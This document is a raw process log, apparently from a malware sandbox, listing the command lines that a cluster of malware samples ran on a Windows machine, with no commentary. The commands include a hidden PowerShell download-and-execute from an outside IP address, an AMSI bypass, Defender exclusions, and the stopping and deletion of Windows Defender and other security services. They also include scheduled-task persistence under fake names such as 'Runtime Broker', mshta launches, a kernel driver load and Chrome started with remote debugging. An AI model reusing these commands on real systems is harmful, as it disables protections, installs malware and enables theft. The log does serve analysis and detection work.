"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
C:\Windows\TEMP\{7EFC0B5C-5407-4A01-A9D8-F9AD31A41A5B}\.cr\xmsn.exe
"C:\Windows\TEMP\{7EFC0B5C-5407-4A01-A9D8-F9AD31A41A5B}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=188 -burn.filehandle.self=184
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\apple.exe
"C:\Users\Admin\AppData\Local\Temp\a\apple.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\TEMP\{053E76E5-B6E1-46EF-B974-DE033A41F558}\.ba\msn.exe
C:\Windows\TEMP\{053E76E5-B6E1-46EF-B974-DE033A41F558}\.ba\msn.exe
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB8F3.tmp.bat""
C:\Windows\system32\taskeng.exe
taskeng.exe {F58D61AB-B5B1-4E38-975E-9FD27F37A9D3} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB903.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn SVcESmaeTDi /tr "mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta
C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe
"C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
C:\Program Files\taskhostw.exe
"C:\Program Files\taskhostw.exe"
C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nY5lEeI4q5DJ.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHostsss'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\10337600101\f73ae_003.exe
"C:\Users\Admin\AppData\Local\Temp\10337600101\f73ae_003.exe"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe
"C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE8E.tmp\BE8F.tmp\BE90.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77bloody_was_here.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
C:\Windows\system32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77bloody_was_here.exe" /TR "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe \"\$77bloody_was_here.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Users\Admin\AppData\Local\Temp\a\Service.exe
"C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn SVcESmaeTDi /tr "mshta C:\Users\Admin\AppData\Local\Temp\zoMI5ZAs9.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77bloody_was_here.exe
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe" go
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "ohEbrmagh7n" /tr "mshta \"C:\Temp\0lMGcDmSs.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C84E.tmp\C84F.tmp\C850.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\0lMGcDmSs.hta"
C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe
"C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "bloody_was_here_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHostsss" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHostsss"
C:\Windows\system32\sc.exe
sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
C:\Windows\system32\sc.exe
sc start ddrver
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\system32\sc.exe
sc stop ddrver
C:\Windows\system32\sc.exe
sc start ddrver
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
C:\Windows\system32\sc.exe
sc stop "WinDefend"
C:\Windows\system32\sc.exe
sc delete "WinDefend"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
C:\Windows\system32\sc.exe
sc stop "MDCoreSvc"
C:\Windows\system32\sc.exe
sc delete "MDCoreSvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord.exe"
C:\Windows\system32\sc.exe
sc stop "WdNisSvc"
C:\Windows\system32\sc.exe
sc delete "WdNisSvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
C:\Windows\system32\sc.exe
sc stop "Sense"
C:\Windows\system32\sc.exe
sc delete "Sense"
C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
C:\Windows\system32\sc.exe
sc stop "wscsvc"
C:\Windows\system32\sc.exe
sc delete "wscsvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
C:\Windows\system32\sc.exe
sc stop "SgrmBroker"
C:\Windows\system32\sc.exe
sc delete "SgrmBroker"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
C:\Windows\system32\sc.exe
sc stop "SecurityHealthService"
C:\Windows\system32\sc.exe
sc delete "SecurityHealthService"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
C:\Windows\system32\sc.exe
sc stop "webthreatdefsvc"
C:\Windows\system32\sc.exe
sc delete "webthreatdefsvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
C:\Windows\system32\sc.exe
sc stop "webthreatdefusersvc"
C:\Windows\system32\sc.exe
sc delete "webthreatdefusersvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
C:\Windows\system32\sc.exe
sc stop "WdNisDrv"
C:\Windows\system32\sc.exe
sc delete "WdNisDrv"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
C:\Windows\system32\sc.exe
sc stop "WdBoot"
C:\Windows\system32\sc.exe
sc delete "WdBoot"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
C:\Windows\system32\sc.exe
sc stop "WdFilter"
C:\Windows\system32\sc.exe
sc delete "WdFilter"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
C:\Windows\system32\sc.exe
sc stop "SgrmAgent"
C:\Windows\system32\sc.exe
sc delete "SgrmAgent"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
C:\Windows\system32\sc.exe
sc stop "MsSecWfp"
C:\Windows\system32\sc.exe
sc delete "MsSecWfp"
C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe
"C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
C:\Windows\system32\sc.exe
sc stop "MsSecFlt"
C:\Windows\system32\sc.exe
sc delete "MsSecFlt"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
C:\Users\Admin\AppData\Local\TempVGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE
"C:\Users\Admin\AppData\Local\TempVGPE7UKI2VTYDKZY8VIO7XOOOKTYXGSD.EXE"
C:\Windows\system32\sc.exe
sc stop "MsSecCore"
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Windows\system32\sc.exe
sc delete "MsSecCore"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
C:\Users\Admin\AppData\Local\Temp\a\x.exe
"C:\Users\Admin\AppData\Local\Temp\a\x.exe"
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9F2.tmp\E9F3.tmp\E9F4.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
"C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe"
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe" go
C:\Windows\system32\sc.exe
sc stop ddrver
C:\Windows\system32\sc.exe
sc delete ddrver
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F299.tmp\F29A.tmp\F29B.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
"C:\Users\Admin\AppData\Local\Temp\a\Build104.exe"
C:\Users\Admin\AppData\Local\Temp\a\si.exe
"C:\Users\Admin\AppData\Local\Temp\a\si.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tMW2bKedNgAo.bat" "
C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe
"C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe"
C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
"C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c "botnet.bat"
C:\Windows\system32\sc.exe
sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
C:\Windows\system32\sc.exe
sc start ddrver
C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\sc.exe
sc stop ddrver
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\system32\sc.exe
sc start ddrver
C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "& { Add-MpPreference -ExclusionPath \"$env:TEMP\"; Add-MpPreference -ExclusionPath \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" }"
C:\Windows\system32\sc.exe
sc stop "WinDefend"
C:\Windows\system32\sc.exe
sc delete "WinDefend"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
C:\Windows\system32\sc.exe
sc stop "MDCoreSvc"
C:\Windows\system32\sc.exe
sc delete "MDCoreSvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\sc.exe
sc stop "WdNisSvc"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 3ryB8ma9Eji /tr "mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\sc.exe
sc delete "WdNisSvc"
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
C:\Windows\system32\sc.exe
sc stop "Sense"
C:\Windows\system32\sc.exe
sc delete "Sense"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); $field.SetValue($null,$true);"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
C:\Windows\system32\sc.exe
sc stop "wscsvc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 3ryB8ma9Eji /tr "mshta C:\Users\Admin\AppData\Local\Temp\02pgjeAcd.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\sc.exe
sc delete "wscsvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
C:\Windows\system32\sc.exe
sc stop "SgrmBroker"
C:\Windows\system32\sc.exe
sc delete "SgrmBroker"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
C:\Windows\system32\sc.exe
sc stop "SecurityHealthService"
C:\Windows\system32\timeout.exe
timeout /t 0.1 /nobreak
C:\Windows\system32\sc.exe
sc delete "SecurityHealthService"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
C:\Windows\system32\sc.exe
sc stop "webthreatdefsvc"
C:\Windows\system32\sc.exe
sc delete "webthreatdefsvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\system32\sc.exe
sc stop "webthreatdefusersvc"
C:\Windows\system32\sc.exe
sc delete "webthreatdefusersvc"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
C:\Windows\system32\sc.exe
sc stop "WdNisDrv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost'
C:\Windows\system32\sc.exe
sc delete "WdNisDrv"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
C:\Windows\system32\sc.exe
sc stop "WdBoot"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "75lRNmd2.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe"' & exit
C:\Windows\system32\sc.exe
sc delete "WdBoot"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName '75lRNmd2.exe-3612' -RunLevel Highest "
C:\Windows\system32\sc.exe
sc stop "WdFilter"
C:\Windows\system32\sc.exe
sc delete "WdFilter"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "75lRNmd2.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\txBNxbxCQmusdqX\75lRNmd2.exe.exe"'
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
C:\Windows\system32\sc.exe
sc stop "SgrmAgent"
C:\Windows\system32\sc.exe
sc delete "SgrmAgent"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
C:\Windows\system32\sc.exe
sc stop "MsSecWfp"
C:\Windows\system32\sc.exe
sc delete "MsSecWfp"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
C:\Windows\system32\sc.exe
sc stop "MsSecFlt"
C:\Windows\system32\sc.exe
sc delete "MsSecFlt"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
C:\Windows\system32\sc.exe
sc stop "MsSecCore"
C:\Windows\system32\sc.exe
sc delete "MsSecCore"
C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
C:\ProgramData\mddjpug\llxax.exe
C:\ProgramData\mddjpug\llxax.exe start2
C:\Users\Admin\AppData\Local\Temp8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE
"C:\Users\Admin\AppData\Local\Temp8LRO28MWPOVJ1XAEN1PMO2DVQB6QZ7VZ.EXE"
C:\Windows\system32\sc.exe
sc stop ddrver
C:\Windows\system32\sc.exe
sc delete ddrver
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost'
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe
"C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HwVC8YbyZUv4.bat" "
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
"C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe"
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe
"C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe"
C:\Users\Admin\AppData\Local\Discord.exe
C:\Users\Admin\AppData\Local\Discord.exe
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHost" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHost"
C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe
"C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ex5IpiVxYQUw.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe
"C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe"
C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe
"C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RcofJF04iQOv.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feef3a9758,0x7feef3a9768,0x7feef3a9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe
"C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
